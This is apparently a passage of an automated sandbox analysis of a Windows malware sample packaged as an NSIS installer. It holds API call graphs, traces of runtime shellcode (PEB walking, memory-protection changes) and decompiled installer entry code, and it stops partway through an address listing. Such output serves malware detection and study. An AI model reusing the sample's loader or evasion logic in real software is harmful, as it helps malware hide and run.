8894 404113 8892->8894 8893->8894 8895 403fbe 8893->8895 8896 404124 GetDlgItem GetDlgItem 8894->8896 8913 404164 8894->8913 8898 403fc9 SetWindowPos 8895->8898 8899 403fdc 8895->8899 8897 404499 18 API calls 8896->8897 8900 40414e SetClassLongW 8897->8900 8898->8899 8903 403fe5 ShowWindow 8899->8903 8904 404027 8899->8904 8905 40140b 2 API calls 8900->8905 8901 4041be 8909 40410e 8901->8909 8965 4044e5 8901->8965 8910 404100 8903->8910 8911 404005 GetWindowLongW 8903->8911 8906 404046 8904->8906 8907 40402f DestroyWindow 8904->8907 8905->8913 8915 40404b SetWindowLongW 8906->8915 8916 40405c 8906->8916 8914 404422 8907->8914 8908 401389 2 API calls 8917 404196 8908->8917 8987 404500 8910->8987 8911->8910 8912 40401e ShowWindow 8911->8912 8912->8904 8913->8901 8913->8908 8914->8909 8923 404453 ShowWindow 8914->8923 8915->8909 8916->8910 8920 404068 GetDlgItem 8916->8920 8917->8901 8921 40419a SendMessageW 8917->8921 8919 404424 DestroyWindow EndDialog 8919->8914 8924 404096 8920->8924 8925 404079 SendMessageW IsWindowEnabled 8920->8925 8921->8909 8922 40140b 2 API calls 8932 4041d0 8922->8932 8923->8909 8927 4040a3 8924->8927 8929 4040ea SendMessageW 8924->8929 8930 4040b6 8924->8930 8938 40409b 8924->8938 8925->8909 8925->8924 8926 40657a 17 API calls 8926->8932 8927->8929 8927->8938 8929->8910 8933 4040d3 8930->8933 8934 4040be 8930->8934 8931 4040d1 8931->8910 8932->8909 8932->8919 8932->8922 8932->8926 8936 404499 18 API calls 8932->8936 8956 404364 DestroyWindow 8932->8956 8968 404499 8932->8968 8937 40140b 2 API calls 8933->8937 8981 40140b 8934->8981 8936->8932 8939 4040da 8937->8939 8984 404472 8938->8984 8939->8910 8939->8938 8941 40424b GetDlgItem 8942 404260 8941->8942 8943 404268 ShowWindow KiUserCallbackDispatcher 8941->8943 8942->8943 8971 4044bb KiUserCallbackDispatcher 8943->8971 8945 404292 EnableWindow 8950 4042a6 8945->8950 8946 4042ab GetSystemMenu EnableMenuItem SendMessageW 8947 4042db SendMessageW 8946->8947 8946->8950 8947->8950 8950->8946 8972 4044ce SendMessageW 8950->8972 8973 403f7b 8950->8973 8976 40653d lstrcpynW 8950->8976 8952 40430a lstrlenW 8953 40657a 17 API calls 8952->8953 8954 404320 SetWindowTextW 8953->8954 8977 401389 8954->8977 8956->8914 8957 40437e CreateDialogParamW 8956->8957 8957->8914 8958 4043b1 8957->8958 8959 404499 18 API calls 8958->8959 8960 4043bc GetDlgItem GetWindowRect ScreenToClient SetWindowPos 8959->8960 8961 401389 2 API calls 8960->8961 8962 404402 8961->8962 8962->8909 8963 40440a ShowWindow 8962->8963 8964 4044e5 SendMessageW 8963->8964 8964->8914 8966 4044fd 8965->8966 8967 4044ee SendMessageW 8965->8967 8966->8932 8967->8966 8969 40657a 17 API calls 8968->8969 8970 4044a4 SetDlgItemTextW 8969->8970 8970->8941 8971->8945 8972->8950 8974 40657a 17 API calls 8973->8974 8975 403f89 SetWindowTextW 8974->8975 8975->8950 8976->8952 8979 401390 8977->8979 8978 4013fe 8978->8932 8979->8978 8980 4013cb MulDiv SendMessageW 8979->8980 8980->8979 8982 401389 2 API calls 8981->8982 8983 401420 8982->8983 8983->8938 8985 404479 8984->8985 8986 40447f SendMessageW 8984->8986 8985->8986 8986->8931 8988 4045c3 8987->8988 8989 404518 GetWindowLongW 8987->8989 8988->8909 8989->8988 8990 40452d 8989->8990 8990->8988 8991 40455a GetSysColor 8990->8991 8992 40455d 8990->8992 8991->8992 8993 404563 SetTextColor 8992->8993 8994 40456d SetBkMode 8992->8994 8993->8994 8995 404585 GetSysColor 8994->8995 8996 40458b 8994->8996 8995->8996 8997 404592 SetBkColor 8996->8997 8998 40459c 8996->8998 8997->8998 8998->8988 8999 4045b6 CreateBrushIndirect 8998->8999 9000 4045af DeleteObject 8998->9000 8999->8988 9000->8999 9001 401b9b 9002 401ba8 9001->9002 9003 401bec 9001->9003 9004 401c31 9002->9004 9010 401bbf 9002->9010 9005 401bf1 9003->9005 9006 401c16 GlobalAlloc 9003->9006 9008 40657a 17 API calls 9004->9008 9014 40239d 9004->9014 9005->9014 9022 40653d lstrcpynW 9005->9022 9007 40657a 17 API calls 9006->9007 9007->9004 9011 402397 9008->9011 9020 40653d lstrcpynW 9010->9020 9011->9014 9023 405b9d 9011->9023 9012 401c03 GlobalFree 9012->9014 9016 401bce 9021 40653d lstrcpynW 9016->9021 9018 401bdd 9027 40653d lstrcpynW 9018->9027 9020->9016 9021->9018 9022->9012 9025 405bb2 9023->9025 9024 405bfe 9024->9014 9025->9024 9026 405bc6 MessageBoxIndirectW 9025->9026 9026->9024 9027->9014 10488 6fe0103d 10491 6fe0101b 10488->10491 10492 6fe015b6 GlobalFree 10491->10492 10493 6fe01020 10492->10493 10494 6fe01024 10493->10494 10495 6fe01027 GlobalAlloc 10493->10495 10496 6fe015dd 3 API calls 10494->10496 10495->10494 10497 6fe0103b 10496->10497 9102 40259e 9112 402de6 9102->9112 9105 402d84 17 API calls 9106 4025b1 9105->9106 9107 4025d9 RegEnumValueW 9106->9107 9108 4025cd RegEnumKeyW 9106->9108 9110 40292e 9106->9110 9109 4025ee RegCloseKey 9107->9109 9108->9109 9109->9110 9113 402da6 17 API calls 9112->9113 9114 402dfd 9113->9114 9115 4063aa RegOpenKeyExW 9114->9115 9116 4025a8 9115->9116 9116->9105 9914 40149e 9915 4014ac PostQuitMessage 9914->9915 9916 40239d 9914->9916 9915->9916 10498 6fe01000 10499 6fe0101b 5 API calls 10498->10499 10500 6fe01019 10499->10500 9121 4015a3 9122 402da6 17 API calls 9121->9122 9123 4015aa SetFileAttributesW 9122->9123 9124 4015bc 9123->9124 10501 401fa4 10502 402da6 17 API calls 10501->10502 10503 401faa 10502->10503 10504 40559f 24 API calls 10503->10504 10505 401fb4 10504->10505 10506 405b20 2 API calls 10505->10506 10507 401fba 10506->10507 10508 401fdd CloseHandle 10507->10508 10510 4069b5 5 API calls 10507->10510 10512 40292e 10507->10512 10508->10512 10511 401fcf 10510->10511 10511->10508 10514 406484 wsprintfW 10511->10514 10514->10508 10515 2a54740 10519 2a54796 10515->10519 10516 2a55027 10517 2a57403 6 API calls 10516->10517 10521 2a54ff7 10516->10521 10518 2a573fd 10517->10518 10519->10516 10519->10521 10523 2a54f75 10519->10523 10520 2a5590a LoadLibraryA 10522 2a5591b 10520->10522 10523->10520 10524 2a56045 2 API calls 10523->10524 10525 2a4dd8e 10523->10525 10526 2a558f2 10524->10526 10526->10520 9137 4021aa 9138 402da6 17 API calls 9137->9138 9139 4021b1 9138->9139 9140 402da6 17 API calls 9139->9140 9141 4021bb 9140->9141 9142 402da6 17 API calls 9141->9142 9143 4021c5 9142->9143 9144 402da6 17 API calls 9143->9144 9145 4021cf 9144->9145 9146 402da6 17 API calls 9145->9146 9147 4021d9 9146->9147 9148 402218 CoCreateInstance 9147->9148 9149 402da6 17 API calls 9147->9149 9152 402237 9148->9152 9149->9148 9150 401423 24 API calls 9151 4022f6 9150->9151 9152->9150 9152->9151 10527 403baa 10528 403bb5 10527->10528 10529 403bb9 10528->10529 10530 403bbc GlobalAlloc 10528->10530 10530->10529 9917 6fe0170d 9923 6fe015b6 9917->9923 9919 6fe0176b GlobalFree 9920 6fe01740 9920->9919 9921 6fe01725 9921->9919 9921->9920 9922 6fe01757 VirtualFree 9921->9922 9922->9919 9925 6fe015bc 9923->9925 9924 6fe015c2 9924->9921 9925->9924 9926 6fe015ce GlobalFree 9925->9926 9926->9921 9927 2a5784a 9928 2a5784f 9927->9928 9929 2a5787d GetPEB 9928->9929 9930 2a578c5 9929->9930 9931 2a58ad4 NtProtectVirtualMemory 9930->9931 9933 2a579ef 9931->9933 9932 2a4d130 9933->9932 9934 2a58397 9933->9934 9947 2a57e09 9933->9947 9937 2a58857 9934->9937 9938 2a584a5 9934->9938 9935 2a58ad4 NtProtectVirtualMemory 9936 2a58acf 9935->9936 9937->9935 9943 2a59d00 9937->9943 9940 2a58ad4 NtProtectVirtualMemory 9938->9940 9939 2a4cb44 GetPEB 9951 2a440aa 9939->9951 9941 2a58852 9940->9941 9942 2a582c1 9942->9932 9944 2a58ad4 NtProtectVirtualMemory 9942->9944 9944->9932 9945 2a55744 9945->9932 9946 2a5590a LoadLibraryA 9945->9946 9949 2a56045 2 API calls 9945->9949 9948 2a5591b 9946->9948 9947->9942 9947->9945 9947->9951 9950 2a558f2 9949->9950 9950->9946 9951->9932 9951->9939 9951->9945 9951->9951 9527 4023b2 9528 4023ba 9527->9528 9531 4023c0 9527->9531 9529 402da6 17 API calls 9528->9529 9529->9531 9530 4023ce 9533 4023dc 9530->9533 9535 402da6 17 API calls 9530->9535 9531->9530 9532 402da6 17 API calls 9531->9532 9532->9530 9534 402da6 17 API calls 9533->9534 9536 4023e5 WritePrivateProfileStringW 9534->9536 9535->9533 9957 4014b8 9958 4014be 9957->9958 9959 401389 2 API calls 9958->9959 9960 4014c6 9959->9960 10531 2a4775c 10534 2a4cb44 GetPEB 10531->10534 10533 2a47763 10538 2a440aa 10534->10538 10535 2a55744 10536 2a5590a LoadLibraryA 10535->10536 10539 2a56045 2 API calls 10535->10539 10541 2a4d130 10535->10541 10537 2a5591b 10536->10537 10537->10533 10538->10534 10538->10535 10538->10538 10538->10541 10540 2a558f2 10539->10540 10540->10536 10541->10533

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 0 40352d-40357d SetErrorMode GetVersionExW 1 4035b7-4035be 0->1 2 40357f-4035b3 GetVersionExW 0->2 3 4035c0 1->3 4 4035c8-403608 1->4 2->1 3->4 5 40360a-403612 call 40690a 4->5 6 40361b 4->6 5->6 12 403614 5->12 7 403620-403634 call 40689a lstrlenA 6->7 13 403636-403652 call 40690a * 3 7->13 12->6 20 403663-4036c5 #17 OleInitialize SHGetFileInfoW call 40653d GetCommandLineW call 40653d 13->20 21 403654-40365a 13->21 28 4036c7-4036c9 20->28 29 4036ce-4036e1 call 405e39 CharNextW 20->29 21->20 26 40365c 21->26 26->20 28->29 32 4037d8-4037de 29->32 33 4037e4 32->33 34 4036e6-4036ec 32->34 35 4037f8-403812 GetTempPathW call 4034fc 33->35 36 4036f5-4036fb 34->36 37 4036ee-4036f3 34->37 44 403814-403832 GetWindowsDirectoryW lstrcatW call 4034fc 35->44 45 40386a-403882 DeleteFileW call 40307d 35->45 39 403702-403706 36->39 40 4036fd-403701 36->40 37->36 37->37 42 4037c6-4037d4 call 405e39 39->42 43 40370c-403712 39->43 40->39 42->32 61 4037d6-4037d7 42->61 47 403714-40371b 43->47 48 40372c-403765 43->48 44->45 64 403834-403864 GetTempPathW lstrcatW SetEnvironmentVariableW * 2 call 4034fc 44->64 66 403888-40388e 45->66 67 403a59-403a67 call 403b12 OleUninitialize 45->67 49 403722 47->49 50 40371d-403720 47->50 51 403781-4037bb 48->51 52 403767-40376c 48->52 49->48 50->48 50->49 58 4037c3-4037c5 51->58 59 4037bd-4037c1 51->59 52->51 56 40376e-403776 52->56 62 403778-40377b 56->62 63 40377d 56->63 58->42 59->58 65 4037e6-4037f3 call 40653d 59->65 61->32 62->51 62->63 63->51 64->45 64->67 65->35 71 403894-4038a7 call 405e39 66->71 72 403935-40393c call 403bec 66->72 79 403a69-403a78 call 405b9d ExitProcess 67->79 80 403a7e-403a84 67->80 81 4038f9-403906 71->81 82 4038a9-4038de 71->82 78 403941-403944 72->78 78->67 84 403a86-403a9b GetCurrentProcess OpenProcessToken 80->84 85 403afc-403b04 80->85 89 403908-403916 call 405f14 81->89 90 403949-40395d call 405b08 lstrcatW 81->90 86 4038e0-4038e4 82->86 92 403acc-403ada call 40690a 84->92 93 403a9d-403ac6 LookupPrivilegeValueW AdjustTokenPrivileges 84->93 87 403b06 85->87 88 403b09-403b0c ExitProcess 85->88 94 4038e6-4038eb 86->94 95 4038ed-4038f5 86->95 87->88 89->67 107 40391c-403932 call 40653d * 2 89->107 105 40396a-403984 lstrcatW lstrcmpiW 90->105 106 40395f-403965 lstrcatW 90->106 103 403ae8-403af3 ExitWindowsEx 92->103 104 403adc-403ae6 92->104 93->92 94->95 99 4038f7 94->99 95->86 95->99 99->81 103->85 108 403af5-403af7 call 40140b 103->108 104->103 104->108 109 403a57 105->109 110 40398a-40398d 105->110 106->105 107->72 108->85 109->67 114 403996 call 405aeb 110->114 115 40398f-403994 call 405a6e 110->115 121 40399b-4039ab SetCurrentDirectoryW 114->121 115->121 123 4039b8-4039e4 call 40653d 121->123 124 4039ad-4039b3 call 40653d 121->124 128 4039e9-403a04 call 40657a DeleteFileW 123->128 124->123 131 403a44-403a4e 128->131 132 403a06-403a16 CopyFileW 128->132 131->128 133 403a50-403a52 call 4062fd 131->133 132->131 134 403a18-403a38 call 4062fd call 40657a call 405b20 132->134 133->109 134->131 142 403a3a-403a41 CloseHandle 134->142 142->131
                                                                                        C-Code - Quality: 79%
                                                                                        			_entry_() {
                                                                                        				WCHAR* _v8;
                                                                                        				signed int _v12;
                                                                                        				void* _v16;
                                                                                        				signed int _v20;
                                                                                        				int _v24;
                                                                                        				int _v28;
                                                                                        				struct _TOKEN_PRIVILEGES _v40;
                                                                                        				signed char _v42;
                                                                                        				int _v44;
                                                                                        				signed int _v48;
                                                                                        				intOrPtr _v278;
                                                                                        				signed short _v310;
                                                                                        				struct _OSVERSIONINFOW _v324;
                                                                                        				struct _SHFILEINFOW _v1016;
                                                                                        				intOrPtr* _t88;
                                                                                        				WCHAR* _t92;
                                                                                        				char* _t94;
                                                                                        				void _t97;
                                                                                        				void* _t116;
                                                                                        				WCHAR* _t118;
                                                                                        				signed int _t120;
                                                                                        				intOrPtr* _t124;
                                                                                        				void* _t138;
                                                                                        				void* _t144;
                                                                                        				void* _t149;
                                                                                        				void* _t153;
                                                                                        				void* _t158;
                                                                                        				signed int _t168;
                                                                                        				void* _t171;
                                                                                        				void* _t176;
                                                                                        				intOrPtr _t178;
                                                                                        				intOrPtr _t179;
                                                                                        				intOrPtr* _t180;
                                                                                        				int _t189;
                                                                                        				void* _t190;
                                                                                        				void* _t199;
                                                                                        				signed int _t205;
                                                                                        				signed int _t210;
                                                                                        				signed int _t215;
                                                                                        				signed int _t217;
                                                                                        				int* _t219;
                                                                                        				signed int _t227;
                                                                                        				signed int _t230;
                                                                                        				CHAR* _t232;
                                                                                        				char* _t233;
                                                                                        				signed int _t234;
                                                                                        				WCHAR* _t235;
                                                                                        				void* _t251;
                                                                                        
                                                                                        				_t217 = 0x20;
                                                                                        				_t189 = 0;
                                                                                        				_v24 = 0;
                                                                                        				_v8 = L"Error writing temporary file. Make sure your temp folder is valid.";
                                                                                        				_v20 = 0;
                                                                                        				SetErrorMode(0x8001); // executed
                                                                                        				_v324.szCSDVersion = 0;
                                                                                        				_v48 = 0;
                                                                                        				_v44 = 0;
                                                                                        				_v324.dwOSVersionInfoSize = 0x11c;
                                                                                        				if(GetVersionExW( &_v324) == 0) {
                                                                                        					_v324.dwOSVersionInfoSize = 0x114;
                                                                                        					GetVersionExW( &_v324);
                                                                                        					asm("sbb eax, eax");
                                                                                        					_v42 = 4;
                                                                                        					_v48 =  !( ~(_v324.szCSDVersion - 0x53)) & _v278 + 0xffffffd0;
                                                                                        				}
                                                                                        				if(_v324.dwMajorVersion < 0xa) {
                                                                                        					_v310 = _v310 & 0x00000000;
                                                                                        				}
                                                                                        				 *0x434fb8 = _v324.dwBuildNumber;
                                                                                        				 *0x434fbc = (_v324.dwMajorVersion & 0x0000ffff | _v324.dwMinorVersion & 0x000000ff) << 0x00000010 | _v48 & 0x0000ffff | _v42 & 0x000000ff;
                                                                                        				if( *0x434fbe != 0x600) {
                                                                                        					_t180 = E0040690A(_t189);
                                                                                        					if(_t180 != _t189) {
                                                                                        						 *_t180(0xc00);
                                                                                        					}
                                                                                        				}
                                                                                        				_t232 = "UXTHEME";
                                                                                        				do {
                                                                                        					E0040689A(_t232); // executed
                                                                                        					_t232 =  &(_t232[lstrlenA(_t232) + 1]);
                                                                                        				} while ( *_t232 != 0);
                                                                                        				E0040690A(0xb);
                                                                                        				 *0x434f04 = E0040690A(9);
                                                                                        				_t88 = E0040690A(7);
                                                                                        				if(_t88 != _t189) {
                                                                                        					_t88 =  *_t88(0x1e);
                                                                                        					if(_t88 != 0) {
                                                                                        						 *0x434fbc =  *0x434fbc | 0x00000080;
                                                                                        					}
                                                                                        				}
                                                                                        				__imp__#17();
                                                                                        				__imp__OleInitialize(_t189); // executed
                                                                                        				 *0x434fc0 = _t88;
                                                                                        				SHGetFileInfoW(0x42b228, _t189,  &_v1016, 0x2b4, _t189); // executed
                                                                                        				E0040653D(0x433f00, L"NSIS Error");
                                                                                        				_t92 = GetCommandLineW();
                                                                                        				_t233 = L"\"C:\\Users\\Arthur\\Desktop\\SecuriteInfo.com.W32.AIDetect.malware2.23037.exe\" ";
                                                                                        				E0040653D(_t233, _t92);
                                                                                        				_t94 = _t233;
                                                                                        				_t234 = 0x22;
                                                                                        				 *0x434f00 = 0x400000;
                                                                                        				_t251 = L"\"C:\\Users\\Arthur\\Desktop\\SecuriteInfo.com.W32.AIDetect.malware2.23037.exe\" " - _t234; // 0x22
                                                                                        				if(_t251 == 0) {
                                                                                        					_t217 = _t234;
                                                                                        					_t94 =  &M00440002;
                                                                                        				}
                                                                                        				_t199 = CharNextW(E00405E39(_t94, _t217));
                                                                                        				_v16 = _t199;
                                                                                        				while(1) {
                                                                                        					_t97 =  *_t199;
                                                                                        					_t252 = _t97 - _t189;
                                                                                        					if(_t97 == _t189) {
                                                                                        						break;
                                                                                        					}
                                                                                        					_t210 = 0x20;
                                                                                        					__eflags = _t97 - _t210;
                                                                                        					if(_t97 != _t210) {
                                                                                        						L17:
                                                                                        						__eflags =  *_t199 - _t234;
                                                                                        						_v12 = _t210;
                                                                                        						if( *_t199 == _t234) {
                                                                                        							_v12 = _t234;
                                                                                        							_t199 = _t199 + 2;
                                                                                        							__eflags = _t199;
                                                                                        						}
                                                                                        						__eflags =  *_t199 - 0x2f;
                                                                                        						if( *_t199 != 0x2f) {
                                                                                        							L32:
                                                                                        							_t199 = E00405E39(_t199, _v12);
                                                                                        							__eflags =  *_t199 - _t234;
                                                                                        							if(__eflags == 0) {
                                                                                        								_t199 = _t199 + 2;
                                                                                        								__eflags = _t199;
                                                                                        							}
                                                                                        							continue;
                                                                                        						} else {
                                                                                        							_t199 = _t199 + 2;
                                                                                        							__eflags =  *_t199 - 0x53;
                                                                                        							if( *_t199 != 0x53) {
                                                                                        								L24:
                                                                                        								asm("cdq");
                                                                                        								asm("cdq");
                                                                                        								_t215 = L"NCRC" & 0x0000ffff;
                                                                                        								asm("cdq");
                                                                                        								_t227 = ( *0x40a2c2 & 0x0000ffff) << 0x00000010 |  *0x40a2c0 & 0x0000ffff | _t215;
                                                                                        								__eflags =  *_t199 - (( *0x40a2be & 0x0000ffff) << 0x00000010 | _t215);
                                                                                        								if( *_t199 != (( *0x40a2be & 0x0000ffff) << 0x00000010 | _t215)) {
                                                                                        									L29:
                                                                                        									asm("cdq");
                                                                                        									asm("cdq");
                                                                                        									_t210 = L" /D=" & 0x0000ffff;
                                                                                        									asm("cdq");
                                                                                        									_t230 = ( *0x40a2b6 & 0x0000ffff) << 0x00000010 |  *0x40a2b4 & 0x0000ffff | _t210;
                                                                                        									__eflags =  *(_t199 - 4) - (( *0x40a2b2 & 0x0000ffff) << 0x00000010 | _t210);
                                                                                        									if( *(_t199 - 4) != (( *0x40a2b2 & 0x0000ffff) << 0x00000010 | _t210)) {
                                                                                        										L31:
                                                                                        										_t234 = 0x22;
                                                                                        										goto L32;
                                                                                        									}
                                                                                        									__eflags =  *_t199 - _t230;
                                                                                        									if( *_t199 == _t230) {
                                                                                        										 *(_t199 - 4) = _t189;
                                                                                        										__eflags = _t199;
                                                                                        										E0040653D(L"C:\\Users\\Arthur\\AppData\\Local\\Temp", _t199);
                                                                                        										L37:
                                                                                        										_t235 = L"C:\\Users\\Arthur\\AppData\\Local\\Temp\\";
                                                                                        										GetTempPathW(0x400, _t235);
                                                                                        										_t116 = E004034FC(_t199, _t252);
                                                                                        										_t253 = _t116;
                                                                                        										if(_t116 != 0) {
                                                                                        											L40:
                                                                                        											DeleteFileW(L"1033"); // executed
                                                                                        											_t118 = E0040307D(_t255, _v20); // executed
                                                                                        											_v8 = _t118;
                                                                                        											if(_t118 != _t189) {
                                                                                        												L68:
                                                                                        												E00403B12();
                                                                                        												__imp__OleUninitialize();
                                                                                        												if(_v8 == _t189) {
                                                                                        													if( *0x434f94 == _t189) {
                                                                                        														L77:
                                                                                        														_t120 =  *0x434fac;
                                                                                        														if(_t120 != 0xffffffff) {
                                                                                        															_v24 = _t120;
                                                                                        														}
                                                                                        														ExitProcess(_v24);
                                                                                        													}
                                                                                        													if(OpenProcessToken(GetCurrentProcess(), 0x28,  &_v16) != 0) {
                                                                                        														LookupPrivilegeValueW(_t189, L"SeShutdownPrivilege",  &(_v40.Privileges));
                                                                                        														_v40.PrivilegeCount = 1;
                                                                                        														_v28 = 2;
                                                                                        														AdjustTokenPrivileges(_v16, _t189,  &_v40, _t189, _t189, _t189);
                                                                                        													}
                                                                                        													_t124 = E0040690A(4);
                                                                                        													if(_t124 == _t189) {
                                                                                        														L75:
                                                                                        														if(ExitWindowsEx(2, 0x80040002) != 0) {
                                                                                        															goto L77;
                                                                                        														}
                                                                                        														goto L76;
                                                                                        													} else {
                                                                                        														_push(0x80040002);
                                                                                        														_push(0x25);
                                                                                        														_push(_t189);
                                                                                        														_push(_t189);
                                                                                        														_push(_t189);
                                                                                        														if( *_t124() == 0) {
                                                                                        															L76:
                                                                                        															E0040140B(9);
                                                                                        															goto L77;
                                                                                        														}
                                                                                        														goto L75;
                                                                                        													}
                                                                                        												}
                                                                                        												E00405B9D(_v8, 0x200010);
                                                                                        												ExitProcess(2);
                                                                                        											}
                                                                                        											if( *0x434f1c == _t189) {
                                                                                        												L51:
                                                                                        												 *0x434fac =  *0x434fac | 0xffffffff;
                                                                                        												_v24 = E00403BEC(_t265);
                                                                                        												goto L68;
                                                                                        											}
                                                                                        											_t219 = E00405E39(L"\"C:\\Users\\Arthur\\Desktop\\SecuriteInfo.com.W32.AIDetect.malware2.23037.exe\" ", _t189);
                                                                                        											if(_t219 < L"\"C:\\Users\\Arthur\\Desktop\\SecuriteInfo.com.W32.AIDetect.malware2.23037.exe\" ") {
                                                                                        												L48:
                                                                                        												_t264 = _t219 - L"\"C:\\Users\\Arthur\\Desktop\\SecuriteInfo.com.W32.AIDetect.malware2.23037.exe\" ";
                                                                                        												_v8 = L"Error launching installer";
                                                                                        												if(_t219 < L"\"C:\\Users\\Arthur\\Desktop\\SecuriteInfo.com.W32.AIDetect.malware2.23037.exe\" ") {
                                                                                        													_t190 = E00405B08(__eflags);
                                                                                        													lstrcatW(_t235, L"~nsu");
                                                                                        													__eflags = _t190;
                                                                                        													if(_t190 != 0) {
                                                                                        														lstrcatW(_t235, "A");
                                                                                        													}
                                                                                        													lstrcatW(_t235, L".tmp");
                                                                                        													_t220 = L"C:\\Users\\Arthur\\Desktop";
                                                                                        													_t138 = lstrcmpiW(_t235, L"C:\\Users\\Arthur\\Desktop");
                                                                                        													__eflags = _t138;
                                                                                        													if(_t138 == 0) {
                                                                                        														L67:
                                                                                        														_t189 = 0;
                                                                                        														__eflags = 0;
                                                                                        														goto L68;
                                                                                        													} else {
                                                                                        														__eflags = _t190;
                                                                                        														_push(_t235);
                                                                                        														if(_t190 == 0) {
                                                                                        															E00405AEB();
                                                                                        														} else {
                                                                                        															E00405A6E();
                                                                                        														}
                                                                                        														SetCurrentDirectoryW(_t235);
                                                                                        														__eflags = L"C:\\Users\\Arthur\\AppData\\Local\\Temp"; // 0x43
                                                                                        														if(__eflags == 0) {
                                                                                        															E0040653D(L"C:\\Users\\Arthur\\AppData\\Local\\Temp", _t220);
                                                                                        														}
                                                                                        														E0040653D(0x436000, _v16);
                                                                                        														_t202 = "A" & 0x0000ffff;
                                                                                        														_t144 = ( *0x40a25a & 0x0000ffff) << 0x00000010 | "A" & 0x0000ffff;
                                                                                        														__eflags = _t144;
                                                                                        														_v12 = 0x1a;
                                                                                        														 *0x436800 = _t144;
                                                                                        														do {
                                                                                        															E0040657A(0, 0x42aa28, _t235, 0x42aa28,  *((intOrPtr*)( *0x434f10 + 0x120)));
                                                                                        															DeleteFileW(0x42aa28);
                                                                                        															__eflags = _v8;
                                                                                        															if(_v8 != 0) {
                                                                                        																_t149 = CopyFileW(L"C:\\Users\\Arthur\\Desktop\\SecuriteInfo.com.W32.AIDetect.malware2.23037.exe", 0x42aa28, 1);
                                                                                        																__eflags = _t149;
                                                                                        																if(_t149 != 0) {
                                                                                        																	E004062FD(_t202, 0x42aa28, 0);
                                                                                        																	E0040657A(0, 0x42aa28, _t235, 0x42aa28,  *((intOrPtr*)( *0x434f10 + 0x124)));
                                                                                        																	_t153 = E00405B20(0x42aa28);
                                                                                        																	__eflags = _t153;
                                                                                        																	if(_t153 != 0) {
                                                                                        																		CloseHandle(_t153);
                                                                                        																		_v8 = 0;
                                                                                        																	}
                                                                                        																}
                                                                                        															}
                                                                                        															 *0x436800 =  *0x436800 + 1;
                                                                                        															_t61 =  &_v12;
                                                                                        															 *_t61 = _v12 - 1;
                                                                                        															__eflags =  *_t61;
                                                                                        														} while ( *_t61 != 0);
                                                                                        														E004062FD(_t202, _t235, 0);
                                                                                        														goto L67;
                                                                                        													}
                                                                                        												}
                                                                                        												 *_t219 = _t189;
                                                                                        												_t222 =  &(_t219[2]);
                                                                                        												_t158 = E00405F14(_t264,  &(_t219[2]));
                                                                                        												_t265 = _t158;
                                                                                        												if(_t158 == 0) {
                                                                                        													goto L68;
                                                                                        												}
                                                                                        												E0040653D(L"C:\\Users\\Arthur\\AppData\\Local\\Temp", _t222);
                                                                                        												E0040653D(L"C:\\Users\\Arthur\\AppData\\Local\\Temp", _t222);
                                                                                        												_v8 = _t189;
                                                                                        												goto L51;
                                                                                        											}
                                                                                        											asm("cdq");
                                                                                        											asm("cdq");
                                                                                        											asm("cdq");
                                                                                        											_t205 = ( *0x40a27e & 0x0000ffff) << 0x00000010 | L" _?=" & 0x0000ffff;
                                                                                        											_t168 = ( *0x40a282 & 0x0000ffff) << 0x00000010 |  *0x40a280 & 0x0000ffff | (_t210 << 0x00000020 |  *0x40a282 & 0x0000ffff) << 0x10;
                                                                                        											while( *_t219 != _t205 || _t219[1] != _t168) {
                                                                                        												_t219 = _t219;
                                                                                        												if(_t219 >= L"\"C:\\Users\\Arthur\\Desktop\\SecuriteInfo.com.W32.AIDetect.malware2.23037.exe\" ") {
                                                                                        													continue;
                                                                                        												}
                                                                                        												break;
                                                                                        											}
                                                                                        											_t189 = 0;
                                                                                        											goto L48;
                                                                                        										}
                                                                                        										GetWindowsDirectoryW(_t235, 0x3fb);
                                                                                        										lstrcatW(_t235, L"\\Temp");
                                                                                        										_t171 = E004034FC(_t199, _t253);
                                                                                        										_t254 = _t171;
                                                                                        										if(_t171 != 0) {
                                                                                        											goto L40;
                                                                                        										}
                                                                                        										GetTempPathW(0x3fc, _t235);
                                                                                        										lstrcatW(_t235, L"Low");
                                                                                        										SetEnvironmentVariableW(L"TEMP", _t235);
                                                                                        										SetEnvironmentVariableW(L"TMP", _t235);
                                                                                        										_t176 = E004034FC(_t199, _t254);
                                                                                        										_t255 = _t176;
                                                                                        										if(_t176 == 0) {
                                                                                        											goto L68;
                                                                                        										}
                                                                                        										goto L40;
                                                                                        									}
                                                                                        									goto L31;
                                                                                        								}
                                                                                        								__eflags =  *((intOrPtr*)(_t199 + 4)) - _t227;
                                                                                        								if( *((intOrPtr*)(_t199 + 4)) != _t227) {
                                                                                        									goto L29;
                                                                                        								}
                                                                                        								_t178 =  *((intOrPtr*)(_t199 + 8));
                                                                                        								__eflags = _t178 - 0x20;
                                                                                        								if(_t178 == 0x20) {
                                                                                        									L28:
                                                                                        									_t36 =  &_v20;
                                                                                        									 *_t36 = _v20 | 0x00000004;
                                                                                        									__eflags =  *_t36;
                                                                                        									goto L29;
                                                                                        								}
                                                                                        								__eflags = _t178 - _t189;
                                                                                        								if(_t178 != _t189) {
                                                                                        									goto L29;
                                                                                        								}
                                                                                        								goto L28;
                                                                                        							}
                                                                                        							_t179 =  *((intOrPtr*)(_t199 + 2));
                                                                                        							__eflags = _t179 - _t210;
                                                                                        							if(_t179 == _t210) {
                                                                                        								L23:
                                                                                        								 *0x434fa0 = 1;
                                                                                        								goto L24;
                                                                                        							}
                                                                                        							__eflags = _t179 - _t189;
                                                                                        							if(_t179 != _t189) {
                                                                                        								goto L24;
                                                                                        							}
                                                                                        							goto L23;
                                                                                        						}
                                                                                        					} else {
                                                                                        						goto L16;
                                                                                        					}
                                                                                        					do {
                                                                                        						L16:
                                                                                        						_t199 = _t199 + 2;
                                                                                        						__eflags =  *_t199 - _t210;
                                                                                        					} while ( *_t199 == _t210);
                                                                                        					goto L17;
                                                                                        				}
                                                                                        				goto L37;
                                                                                        			}



















































                                                                                        0x0040353b
                                                                                        0x0040353c
                                                                                        0x00403543
                                                                                        0x00403546
                                                                                        0x0040354d
                                                                                        0x00403550
                                                                                        0x00403563
                                                                                        0x00403569
                                                                                        0x0040356c
                                                                                        0x0040356f
                                                                                        0x0040357d
                                                                                        0x00403585
                                                                                        0x00403590
                                                                                        0x004035a9
                                                                                        0x004035ab
                                                                                        0x004035b3
                                                                                        0x004035b3
                                                                                        0x004035be
                                                                                        0x004035c0
                                                                                        0x004035c0
                                                                                        0x004035d5
                                                                                        0x004035fa
                                                                                        0x00403608
